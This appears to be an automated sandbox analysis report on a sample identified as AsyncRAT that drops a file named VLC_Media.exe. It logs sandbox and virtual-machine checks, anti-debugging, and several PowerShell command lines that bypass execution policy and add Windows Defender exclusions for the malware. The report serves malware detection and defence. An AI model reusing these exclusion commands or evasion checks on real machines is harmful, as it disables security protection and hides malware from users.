                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: 18fvs4AVae.exe, 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: 18fvs4AVae.exe, VLC_Media.exe.0.drBinary or memory string: SBIEDLL.DLLINFO
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeMemory allocated: 1A770000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeWindow / User API: threadDelayed 4013Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeWindow / User API: threadDelayed 5822Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6743Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3112Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7634Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2021Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6906Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2784Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7203
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2277
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe TID: 1892Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 7634 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 2021 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 6906 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 2784 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456Thread sleep count: 7203 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1020Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep count: 2277 > 30
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: VLC_Media.exe.0.drBinary or memory string: vmware
                            Source: 18fvs4AVae.exe, 00000000.00000002.2977632965.000000001B480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeCode function: 0_2_00007FFD9B896E61 CheckRemoteDebuggerPresent,0_2_00007FFD9B896E61
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'Jump to behavior
                            Bypasses PowerShell execution policy
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeQueries volume information: C:\Users\user\Desktop\18fvs4AVae.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
